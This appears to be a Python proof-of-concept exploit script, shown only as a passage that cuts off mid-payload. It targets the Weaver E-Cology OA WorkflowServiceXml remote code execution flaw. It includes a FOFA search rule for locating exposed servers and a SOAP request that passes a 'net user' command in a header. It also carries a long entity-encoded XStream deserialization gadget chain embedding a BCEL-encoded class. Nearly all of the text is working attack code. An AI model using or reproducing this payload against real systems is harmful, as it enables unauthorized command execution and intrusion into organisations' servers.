96e023c0b07c09f334b44fcfb9abfe741a082f0f
[ "MIT" ]
9
2022-03-22T12:10:44.000Z
2022-03-25T07:37:01.000Z
#!/usr/bin/env python3 # _*_ coding:utf-8 _*_ import requests import sys from requests.packages.urllib3.exceptions import InsecureRequestWarning ######################################################################################################################## # 脚本信息 NAME='Weaver_e_Cology_RCE' AUTHOR="Faith" REMARK='泛微E-Cology WorkflowServiceXml RCE' FOFA_RULE='app="泛微-协同办公OA"' ######################################################################################################################## def poc(target): result={} url = target + "/services%20/WorkflowServiceXml" cmd = "net user" headers = { 'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)', 'SOAPAction': '""', 'Cmd': cmd, "Content-Type": "text/xml;charset=UTF-8" } data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn"> <soapenv:Header/> <soapenv:Body> <web:doCreateWorkflowRequest> <web:string> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn"> <soapenv:Header/> <soapenv:Body> <web:doCreateWorkflowRequest> <web:string> 
&#x3c;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x50;&#x72;&#x69;&#x6f;&#x72;&#x69;&#x74;&#x79;&#x51;&#x75;&#x65;&#x75;&#x65;&#x20;&#x73;&#x65;&#x72;&#x69;&#x61;&#x6c;&#x69;&#x7a;&#x61;&#x74;&#x69;&#x6f;&#x6e;&#x3d;&#x27;&#x63;&#x75;&#x73;&#x74;&#x6f;&#x6d;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x3c;&#x75;&#x6e;&#x73;&#x65;&#x72;&#x69;&#x61;&#x6c;&#x69;&#x7a;&#x61;&#x62;&#x6c;&#x65;&#x2d;&#x70;&#x61;&#x72;&#x65;&#x6e;&#x74;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x3c;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x50;&#x72;&#x69;&#x6f;&#x72;&#x69;&#x74;&#x79;&#x51;&#x75;&#x65;&#x75;&#x65;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x73;&#x69;&#x7a;&#x65;&#x3e;&#x32;&#x3c;&#x2f;&#x73;&#x69;&#x7a;&#x65;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6f;&#x6d;&#x70;&#x61;&#x72;&#x61;&#x74;&#x6f;&#x72;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x66;&#x78;&#x2e;&#x63;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x73;&#x2e;&#x4f;&#x62;&#x73;&#x65;&#x72;&#x76;&#x61;&#x62;&#x6c;&#x65;&#x4c;&#x69;&#x73;&#x74;&#x24;&#x31;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x69;&#x6e;&#x74;&#x3e;&#x33;&#x3c;&#x2f;&#x69;&#x6e;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x78;&#x6d;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x62;&#x69;&#x6e;&#x64;&#x2e;&#x76;&#x32;&#x2e;&#x72;&#x75;&#x6e;&#x74;&#x69;&#x6d;&#x65;&#x2e;&#x75;&#x6e;&#x6d;&#x61;&#x72;&#x73;&#x68;&#x61;&#x6c;&#x6c;&#x65;&#x72;&#x2e;&#x42;&#x61;&#x73;&#x65;&#x36;&#x34;&#x44;&#x61;&#x74;&#x61;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x61;&#x74;&#x61;&#x48;&#x61;&#x6e;&#x64;&#x6c;&#x65;&#x72;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#
x61;&#x74;&#x61;&#x53;&#x6f;&#x75;&#x72;&#x63;&#x65;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x78;&#x6d;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x77;&#x73;&#x2e;&#x65;&#x6e;&#x63;&#x6f;&#x64;&#x69;&#x6e;&#x67;&#x2e;&#x78;&#x6d;&#x6c;&#x2e;&#x58;&#x4d;&#x4c;&#x4d;&#x65;&#x73;&#x73;&#x61;&#x67;&#x65;&#x24;&#x58;&#x6d;&#x6c;&#x44;&#x61;&#x74;&#x61;&#x53;&#x6f;&#x75;&#x72;&#x63;&#x65;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6f;&#x6e;&#x74;&#x65;&#x6e;&#x74;&#x54;&#x79;&#x70;&#x65;&#x3e;&#x74;&#x65;&#x78;&#x74;&#x2f;&#x70;&#x6c;&#x61;&#x69;&#x6e;&#x3c;&#x2f;&#x63;&#x6f;&#x6e;&#x74;&#x65;&#x6e;&#x74;&#x54;&#x79;&#x70;&#x65;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x69;&#x73;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x69;&#x6f;&#x2e;&#x53;&#x65;&#x71;&#x75;&#x65;&#x6e;&#x63;&#x65;&#x49;&#x6e;&#x70;&#x75;&#x74;&#x53;&#x74;&#x72;&#x65;&#x61;&#x6d;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x65;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x78;&#x2e;&#x73;&#x77;&#x69;&#x6e;&#x67;&#x2e;&#x4d;&#x75;&#x6c;&#x74;&#x69;&#x55;&#x49;&#x44;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x73;&#x24;&#x4d;&#x75;&#x6c;&#x74;&#x69;&#x55;&#x49;&#x44;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x73;&#x45;&#x6e;&#x75;&#x6d;&#x65;&#x72;&#x61;&#x74;&#x6f;&#x72;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x69;&#x74;&#x65;&#x72;&#x61;&#x74;&#x6f;&#x72;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x74;&#x6f;&#x6f;&#x6c;&#x73;&#x2e;&#x6a;&#x61;&#x76;&#x61;&#x63;&#x2e;&#x70;&#x72;&#x6f;&#x63;&#x65;&#x73;&#x73;&#x69;&#x6e;&#x67;&#x2e;&#x4a;&#x61;&#x76;&#x61;&#x63;&#x50;&#x72;&#x6f;&#x63;&#x65;&#x73;&#x73;&#x69;&#x6
e;&#x67;&#x45;&#x6e;&#x76;&#x69;&#x72;&#x6f;&#x6e;&#x6d;&#x65;&#x6e;&#x74;&#x24;&#x4e;&#x61;&#x6d;&#x65;&#x50;&#x72;&#x6f;&#x63;&#x65;&#x73;&#x73;&#x49;&#x74;&#x65;&#x72;&#x61;&#x74;&#x6f;&#x72;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6e;&#x61;&#x6d;&#x65;&#x73;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x41;&#x62;&#x73;&#x74;&#x72;&#x61;&#x63;&#x74;&#x4c;&#x69;&#x73;&#x74;&#x24;&#x49;&#x74;&#x72;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x75;&#x72;&#x73;&#x6f;&#x72;&#x3e;&#x30;&#x3c;&#x2f;&#x63;&#x75;&#x72;&#x73;&#x6f;&#x72;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6c;&#x61;&#x73;&#x74;&#x52;&#x65;&#x74;&#x3e;&#x2d;&#x31;&#x3c;&#x2f;&#x6c;&#x61;&#x73;&#x74;&#x52;&#x65;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x65;&#x78;&#x70;&#x65;&#x63;&#x74;&#x65;&#x64;&#x4d;&#x6f;&#x64;&#x43;&#x6f;&#x75;&#x6e;&#x74;&#x3e;&#x30;&#x3c;&#x2f;&#x65;&#x78;&#x70;&#x65;&#x63;&#x74;&#x65;&#x64;&#x4d;&#x6f;&#x64;&#x43;&#x6f;&#x75;&#x6e;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6f;&#x75;&#x74;&#x65;&#x72;&#x2d;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x41;&#x72;&#x72;&#x61;&#x79;&#x73;&#x24;&#x41;&#x72;&#x72;&#x61;&#x79;&#x4c;&#x69;&#x73;&#x74;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x61;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x2d;&#x61;
&#x72;&#x72;&#x61;&#x79;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x24;&#x24;&#x42;&#x43;&#x45;&#x4c;&#x24;&#x24;&#x24;&#x6c;&#x24;&#x38;&#x62;&#x24;&#x49;&#x24;&#x41;&#x24;&#x41;&#x24;&#x41;&#x24;&#x41;&#x24;&#x41;&#x24;&#x41;&#x24;&#x41;&#x24;&#x38;&#x35;&#x56;&#x24;&#x35;&#x62;&#x57;&#x24;&#x54;&#x57;&#x24;&#x55;&#x24;&#x66;&#x65;&#x24;&#x38;&#x36;&#x24;&#x71;&#x24;&#x63;&#x63;&#x30;&#x24;&#x4d;&#x24;&#x38;&#x32;&#x41;&#x24;&#x38;&#x34;&#x24;&#x61;&#x38;&#x24;&#x62;&#x64;&#x24;&#x64;&#x38;&#x56;&#x24;&#x4e;&#x24;&#x75;&#x24;&#x38;&#x39;&#x24;&#x64;&#x36;&#x24;&#x64;&#x65;&#x24;&#x4d;&#x24;&#x64;&#x36;&#x24;&#x38;&#x61;&#x24;&#x35;&#x63;&#x24;&#x65;&#x61;&#x24;&#x72;&#x24;&#x61;&#x30;&#x35;&#x24;&#x55;&#x24;&#x78;&#x24;&#x64;&#x61;&#x24;&#x65;&#x61;&#x30;&#x24;&#x69;&#x61;&#x24;&#x71;&#x24;&#x39;&#x39;&#x24;&#x38;&#x39;&#x24;&#x39;&#x33;&#x24;&#x4a;&#x50;&#x24;&#x37;&#x62;&#x24;&#x62;&#x31;&#x24;&#x61;&#x64;&#x24;&#x62;&#x64;&#x24;&#x64;&#x66;&#x24;&#x65;&#x66;&#x24;&#x61;&#x64;&#x24;&#x62;&#x64;&#x24;&#x62;&#x63;&#x24;&#x66;&#x38;&#x24;&#x65;&#x32;&#x53;&#x24;&#x6c;&#x24;&#x35;&#x63;&#x24;&#x61;&#x62;&#x24;&#x78;&#x6a;&#x24;&#x35;&#x62;&#x24;&#x62;&#x62;&#x24;&#x64;&#x61;&#x24;&#x33;&#x65;&#x24;&#x66;&#x36;&#x47;&#x69;&#x24;&#x62;&#x66;&#x33;&#x24;&#x4a;&#x24;&#x39;&#x34;&#x24;&#x39;&#x30;&#x24;&#x61;&#x38;&#x24;&#x61;&#x63;&#x24;&#x63;&#x35;&#x24;&#x39;&#x39;&#x39;&#x24;&#x66;&#x62;&#x24;&#x37;&#x63;&#x24;&#x66;&#x62;&#x24;&#x66;&#x36;&#x24;&#x65;&#x64;&#x24;&#x62;&#x64;&#x4f;&#x24;&#x65;&#x36;&#x24;&#x64;&#x66;&#x24;&#x35;&#x62;&#x24;&#x62;&#x66;&#x24;&#x66;&#x64;&#x24;&#x4a;&#x24;&#x65;&#x30;&#x31;&#x24;&#x66;&#x63;&#x24;&#x61;&#x63;&#x24;&#x61;&#x33;&#x24;&#x4a;&#x24;&#x38;&#x37;&#x74;&#x24;&#x61;&#x34;&#x31;&#x24;&#x6f;&#x24;&#x39;&#x37;&#x51;&#x24;&#x4e;&#x24;&#x38;&#x37;&#x75;&#x24;&#x69;&#x24;&#x63;&#
x31;&#x73;&#x24;&#x67;&#x24;&#x38;&#x65;&#x24;&#x61;&#x61;&#x24;&#x63;&#x38;&#x24;&#x65;&#x38;&#x50;&#x31;&#x24;&#x61;&#x36;&#x24;&#x65;&#x32;&#x79;&#x24;&#x6a;&#x24;&#x65;&#x33;&#x38;&#x24;&#x73;&#x24;&#x39;&#x31;&#x24;&#x5f;&#x48;&#x24;&#x63;&#x39;&#x71;&#x24;&#x4e;&#x24;&#x54;&#x24;&#x66;&#x32;&#x79;&#x42;&#x24;&#x63;&#x37;&#x49;&#x24;&#x62;&#x63;&#x24;&#x75;&#x24;&#x39;&#x37;&#x24;&#x39;&#x37;&#x34;&#x24;&#x39;&#x63;&#x52;&#x71;&#x5a;&#x24;&#x38;&#x33;&#x24;&#x61;&#x39;&#x24;&#x70;&#x24;&#x38;&#x61;&#x49;&#x24;&#x4e;&#x24;&#x39;&#x36;&#x24;&#x38;&#x61;&#x24;&#x76;&#x24;&#x4e;&#x24;&#x76;&#x24;&#x56;&#x42;&#x24;&#x63;&#x37;&#x24;&#x5a;&#x4c;&#x24;&#x63;&#x62;&#x65;&#x46;&#x24;&#x38;&#x37;&#x24;&#x38;&#x64;&#x24;&#x62;&#x33;&#x24;&#x33;&#x61;&#x24;&#x62;&#x61;&#x30;&#x24;&#x61;&#x62;&#x24;&#x6e;&#x24;&#x78;&#x24;&#x39;&#x66;&#x39;&#x24;&#x62;&#x39;&#x38;&#x72;&#x71;&#x35;&#x24;&#x65;&#x34;&#x55;&#x24;&#x39;&#x63;&#x24;&#x64;&#x33;&#x24;&#x66;&#x31;&#x24;&#x51;&#x24;&#x33;&#x63;&#x24;&#x56;&#x24;&#x46;&#x24;&#x46;&#x24;&#x38;&#x64;&#x24;&#x62;&#x62;&#x6d;&#x24;&#x63;&#x37;&#x24;&#x66;&#x36;&#x24;&#x66;&#x37;&#x24;&#x75;&#x24;&#x49;&#x24;&#x63;&#x35;&#x24;&#x62;&#x62;&#x24;&#x63;&#x37;&#x24;&#x56;&#x24;&#x38;&#x34;&#x24;&#x48;&#x24;&#x64;&#x63;&#x24;&#x76;&#x24;&#x61;&#x31;&#x24;&#x61;&#x30;&#x35;&#x6d;&#x24;&#x33;&#x62;&#x62;&#x24;&#x62;&#x34;&#x24;&#x39;&#x38;&#x24;&#x39;&#x62;&#x24;&#x55;&#x24;&#x64;&#x65;&#x24;&#x39;&#x38;&#x39;&#x24;&#x39;&#x39;&#x24;&#x61;&#x35;&#x24;&#x71;&#x24;&#x39;&#x61;&#x76;&#x24;&#x7a;&#x33;&#x24;&#x33;&#x62;&#x6e;&#x7a;&#x24;&#x62;&#x36;&#x24;&#x64;&#x63;&#x57;&#x24;&#x38;&#x34;&#x61;&#x24;&#x37;&#x66;&#x24;&#x63;&#x36;&#x24;&#x61;&#x36;&#x24;&#x38;&#x64;&#x24;&#x65;&#x36;&#x24;&#x66;&#x34;&#x24;&#x62;&#x65;&#x24;&#x38;&#x31;&#x24;&#x61;&#x31;&#x74;&#x72;&#x68;&#x24;&#x63;&#x65;&#x24;&#x63;&#x65;&#x24;&#x66;&#x36;&#x24;&#x76;&#x24;&#x64;&#x30;&#x76;&#x24;&#x35;&#x62;&#x24;&#x64;&#x39;&#x24;&#x38;&#x61;&#x24;&#x63;&#x64;&#x24;&#x61;&#x3
8;&#x6f;&#x24;&#x65;&#x35;&#x24;&#x4c;&#x24;&#x61;&#x65;&#x35;&#x24;&#x78;&#x24;&#x37;&#x63;&#x24;&#x64;&#x61;&#x24;&#x39;&#x62;&#x24;&#x6a;&#x24;&#x63;&#x38;&#x24;&#x39;&#x61;&#x24;&#x65;&#x37;&#x24;&#x63;&#x66;&#x24;&#x78;&#x58;&#x24;&#x39;&#x64;&#x24;&#x33;&#x65;&#x6b;&#x24;&#x63;&#x65;&#x24;&#x39;&#x39;&#x24;&#x63;&#x39;&#x24;&#x61;&#x63;&#x24;&#x65;&#x39;&#x4c;&#x24;&#x74;&#x24;&#x76;&#x24;&#x77;&#x24;&#x55;&#x24;&#x61;&#x38;&#x24;&#x54;&#x24;&#x39;&#x64;&#x24;&#x57;&#x24;&#x66;&#x65;&#x24;&#x34;&#x30;&#x24;&#x64;&#x31;&#x24;&#x66;&#x33;&#x24;&#x38;&#x34;&#x24;&#x65;&#x33;&#x24;&#x6c;&#x24;&#x56;&#x24;&#x65;&#x37;&#x24;&#x38;&#x61;&#x24;&#x61;&#x32;&#x24;&#x65;&#x30;&#x24;&#x38;&#x66;&#x24;&#x75;&#x58;&#x24;&#x62;&#x37;&#x24;&#x4d;&#x24;&#x65;&#x38;&#x24;&#x38;&#x39;&#x33;&#x59;&#x61;&#x24;&#x66;&#x39;&#x24;&#x63;&#x39;&#x24;&#x52;&#x24;&#x65;&#x31;&#x24;&#x63;&#x66;&#x24;&#x62;&#x38;&#x53;&#x24;&#x64;&#x34;&#x58;&#x65;&#x55;&#x24;&#x63;&#x31;&#x65;&#x24;&#x38;&#x30;&#x24;&#x66;&#x66;&#x24;&#x61;&#x33;&#x24;&#x50;&#x4f;&#x24;&#x39;&#x65;&#x24;&#x72;&#x24;&#x39;&#x38;&#x24;&#x75;&#x24;&#x65;&#x35;&#x24;&#x38;&#x63;&#x24;&#x38;&#x32;&#x58;&#x24;&#x6a;&#x33;&#x24;&#x63;&#x33;&#x24;&#x62;&#x36;&#x24;&#x63;&#x38;&#x4a;&#x24;&#x78;&#x24;&#x39;&#x61;&#x24;&#x74;&#x24;&#x4b;&#x79;&#x24;&#x64;&#x37;&#x24;&#x76;&#x30;&#x24;&#x58;&#x24;&#x39;&#x64;&#x24;&#x6e;&#x24;&#x69;&#x24;&#x66;&#x33;&#x6c;&#x5f;&#x78;&#x74;&#x24;&#x61;&#x64;&#x24;&#x63;&#x63;&#x24;&#x78;&#x68;&#x24;&#x78;&#x24;&#x65;&#x62;&#x24;&#x64;&#x39;&#x6e;&#x24;&#x62;&#x32;&#x24;&#x79;&#x24;&#x65;&#x65;&#x24;&#x78;&#x63;&#x24;&#x66;&#x36;&#x24;&#x4c;&#x73;&#x24;&#x77;&#x24;&#x63;&#x30;&#x24;&#x38;&#x34;&#x24;&#x61;&#x63;&#x24;&#x64;&#x63;&#x54;&#x24;&#x62;&#x35;&#x24;&#x64;&#x62;&#x24;&#x38;&#x63;&#x24;&#x65;&#x66;&#x24;&#x64;&#x39;&#x24;&#x63;&#x65;&#x24;&#x62;&#x34;&#x74;&#x4b;&#x52;&#x24;&#x64;&#x61;&#x24;&#x63;&#x62;&#x24;&#x48;&#x45;&#x24;&#x64;&#x66;&#x24;&#x63;&#x65;&#x24;&#x73;&#x33;&#x24;&#x39;&#x36;
&#x24;&#x65;&#x39;&#x38;&#x24;&#x38;&#x31;&#x24;&#x38;&#x35;&#x24;&#x63;&#x38;&#x24;&#x39;&#x63;&#x24;&#x65;&#x39;&#x24;&#x65;&#x64;&#x24;&#x64;&#x38;&#x24;&#x61;&#x31;&#x24;&#x61;&#x30;&#x63;&#x24;&#x39;&#x39;&#x24;&#x64;&#x61;&#x24;&#x64;&#x30;&#x24;&#x38;&#x32;&#x24;&#x72;&#x24;&#x66;&#x32;&#x24;&#x62;&#x65;&#x24;&#x65;&#x64;&#x24;&#x33;&#x61;&#x24;&#x33;&#x63;&#x6f;&#x24;&#x63;&#x39;&#x24;&#x66;&#x38;&#x24;&#x61;&#x36;&#x35;&#x24;&#x33;&#x62;&#x62;&#x24;&#x65;&#x36;&#x24;&#x44;&#x24;&#x38;&#x36;&#x24;&#x64;&#x39;&#x24;&#x59;&#x24;&#x77;&#x24;&#x37;&#x63;&#x24;&#x62;&#x36;&#x24;&#x38;&#x35;&#x24;&#x38;&#x61;&#x24;&#x6f;&#x24;&#x61;&#x62;&#x24;&#x63;&#x65;&#x52;&#x24;&#x62;&#x33;&#x24;&#x63;&#x65;&#x24;&#x79;&#x24;&#x6c;&#x24;&#x70;&#x24;&#x63;&#x39;&#x24;&#x62;&#x38;&#x45;&#x24;&#x63;&#x66;&#x24;&#x53;&#x24;&#x63;&#x33;&#x24;&#x62;&#x36;&#x24;&#x79;&#x43;&#x24;&#x39;&#x33;&#x64;&#x24;&#x33;&#x65;&#x24;&#x6e;&#x24;&#x4e;&#x24;&#x67;&#x24;&#x64;&#x38;&#x24;&#x38;&#x34;&#x24;&#x63;&#x64;&#x24;&#x77;&#x24;&#x65;&#x36;&#x24;&#x4d;&#x24;&#x63;&#x63;&#x63;&#x24;&#x63;&#x31;&#x24;&#x63;&#x30;&#x24;&#x63;&#x62;&#x24;&#x6d;&#x24;&#x64;&#x66;&#x24;&#x35;&#x62;&#x24;&#x79;&#x37;&#x24;&#x39;&#x37;&#x24;&#x62;&#x30;&#x24;&#x63;&#x63;&#x24;&#x61;&#x32;&#x35;&#x24;&#x65;&#x33;&#x24;&#x73;&#x24;&#x69;&#x24;&#x65;&#x31;&#x24;&#x63;&#x66;&#x24;&#x62;&#x62;&#x24;&#x64;&#x65;&#x6c;&#x24;&#x6f;&#x6b;&#x24;&#x58;&#x24;&#x37;&#x63;&#x24;&#x65;&#x31;&#x24;&#x71;&#x24;&#x63;&#x36;&#x24;&#x61;&#x63;&#x24;&#x37;&#x63;&#x66;&#x24;&#x61;&#x39;&#x24;&#x33;&#x63;&#x24;&#x77;&#x24;&#x35;&#x65;&#x31;&#x24;&#x66;&#x30;&#x24;&#x77;&#x24;&#x35;&#x65;&#x63;&#x24;&#x38;&#x35;&#x6a;&#x24;&#x61;&#x61;&#x24;&#x63;&#x31;&#x24;&#x38;&#x65;&#x58;&#x51;&#x34;&#x24;&#x44;&#x24;&#x61;&#x66;&#x24;&#x65;&#x33;&#x24;&#x43;&#x49;&#x5a;&#x49;&#x24;&#x33;&#x61;&#x24;&#x65;&#x33;&#x35;&#x24;&#x66;&#x30;&#x24;&#x47;&#x24;&#x64;&#x65;&#x34;&#x24;&#x66;&#x30;&#x24;&#x57;&#x24;&#x24;&#x24;&#x67;&#x78;&#x24;&#x68;&#x24;&#
x58;&#x24;&#x61;&#x39;&#x24;&#x37;&#x62;&#x6a;&#x24;&#x39;&#x31;&#x24;&#x65;&#x36;&#x61;&#x24;&#x64;&#x33;&#x24;&#x6f;&#x24;&#x37;&#x62;&#x24;&#x47;&#x24;&#x64;&#x65;&#x24;&#x63;&#x31;&#x24;&#x62;&#x62;&#x4c;&#x24;&#x63;&#x39;&#x24;&#x63;&#x30;&#x24;&#x37;&#x62;&#x78;&#x24;&#x64;&#x66;&#x24;&#x63;&#x30;&#x24;&#x48;&#x24;&#x66;&#x38;&#x24;&#x39;&#x30;&#x39;&#x24;&#x79;&#x24;&#x64;&#x31;&#x24;&#x63;&#x66;&#x24;&#x64;&#x61;&#x56;&#x24;&#x54;&#x24;&#x63;&#x66;&#x32;&#x24;&#x38;&#x64;&#x24;&#x58;&#x24;&#x62;&#x33;&#x63;&#x24;&#x4d;&#x43;&#x37;&#x24;&#x66;&#x30;&#x24;&#x52;&#x24;&#x33;&#x65;&#x24;&#x24;&#x24;&#x38;&#x33;&#x24;&#x63;&#x62;&#x75;&#x24;&#x61;&#x38;&#x24;&#x38;&#x61;&#x24;&#x61;&#x30;&#x24;&#x63;&#x63;&#x24;&#x33;&#x66;&#x24;&#x65;&#x33;&#x24;&#x61;&#x66;&#x61;&#x24;&#x35;&#x65;&#x24;&#x63;&#x35;&#x24;&#x74;&#x24;&#x47;&#x24;&#x33;&#x65;&#x24;&#x63;&#x35;&#x67;&#x24;&#x47;&#x24;&#x33;&#x65;&#x24;&#x63;&#x37;&#x24;&#x58;&#x24;&#x77;&#x24;&#x62;&#x65;&#x34;&#x24;&#x66;&#x30;&#x24;&#x56;&#x24;&#x62;&#x65;&#x24;&#x39;&#x36;&#x64;&#x24;&#x37;&#x64;&#x24;&#x61;&#x33;&#x24;&#x61;&#x30;&#x24;&#x65;&#x31;&#x64;&#x24;&#x62;&#x66;&#x24;&#x38;&#x31;&#x6f;&#x24;&#x66;&#x31;&#x24;&#x39;&#x64;&#x24;&#x38;&#x31;&#x24;&#x65;&#x66;&#x71;&#x24;&#x63;&#x39;&#x24;&#x63;&#x30;&#x24;&#x50;&#x24;&#x66;&#x38;&#x51;&#x24;&#x42;&#x58;&#x24;&#x62;&#x66;&#x24;&#x33;&#x61;&#x24;&#x46;&#x32;&#x24;&#x66;&#x30;&#x24;&#x54;&#x36;&#x24;&#x64;&#x33;&#x24;&#x66;&#x64;&#x52;&#x24;&#x62;&#x62;&#x24;&#x78;&#x24;&#x65;&#x38;&#x24;&#x62;&#x61;&#x53;&#x24;&#x38;&#x66;&#x24;&#x77;&#x24;&#x65;&#x38;&#x24;&#x62;&#x63;&#x43;&#x24;&#x64;&#x66;&#x55;&#x24;&#x63;&#x35;&#x24;&#x33;&#x63;&#x36;&#x24;&#x65;&#x33;&#x31;&#x24;&#x52;&#x24;&#x57;&#x24;&#x62;&#x65;&#x24;&#x64;&#x32;&#x24;&#x63;&#x66;&#x24;&#x38;&#x62;&#x24;&#x66;&#x62;&#x35;&#x24;&#x66;&#x31;&#x24;&#x65;&#x65;&#x24;&#x66;&#x34;&#x4a;&#x24;&#x55;&#x24;&#x66;&#x62;&#x24;&#x61;&#x33;&#x43;&#x24;&#x39;&#x36;&#x24;&#x63;&#x36;&#x75;&#x24;&#x37;&#x63;&#x2
4;&#x62;&#x31;&#x24;&#x65;&#x30;&#x24;&#x48;&#x65;&#x48;&#x24;&#x62;&#x62;&#x65;&#x24;&#x57;&#x62;&#x55;&#x24;&#x66;&#x30;&#x65;&#x47;&#x52;&#x24;&#x61;&#x37;&#x24;&#x65;&#x65;&#x24;&#x42;&#x24;&#x64;&#x33;&#x24;&#x63;&#x38;&#x24;&#x66;&#x32;&#x24;&#x72;&#x24;&#x39;&#x30;&#x24;&#x75;&#x24;&#x64;&#x38;&#x24;&#x55;&#x24;&#x61;&#x66;&#x24;&#x65;&#x64;&#x24;&#x65;&#x33;&#x24;&#x67;&#x24;&#x38;&#x62;&#x24;&#x37;&#x64;&#x65;&#x24;&#x65;&#x36;&#x24;&#x58;&#x24;&#x66;&#x33;&#x24;&#x64;&#x62;&#x24;&#x35;&#x62;&#x47;&#x24;&#x65;&#x37;&#x44;&#x24;&#x38;&#x64;&#x4e;&#x24;&#x66;&#x37;&#x24;&#x64;&#x64;&#x24;&#x61;&#x36;&#x24;&#x62;&#x38;&#x24;&#x64;&#x31;&#x76;&#x24;&#x65;&#x36;&#x24;&#x64;&#x63;&#x59;&#x24;&#x62;&#x36;&#x24;&#x66;&#x30;&#x24;&#x61;&#x65;&#x78;&#x24;&#x65;&#x64;&#x24;&#x66;&#x38;&#x24;&#x39;&#x65;&#x24;&#x61;&#x38;&#x24;&#x56;&#x75;&#x24;&#x64;&#x37;&#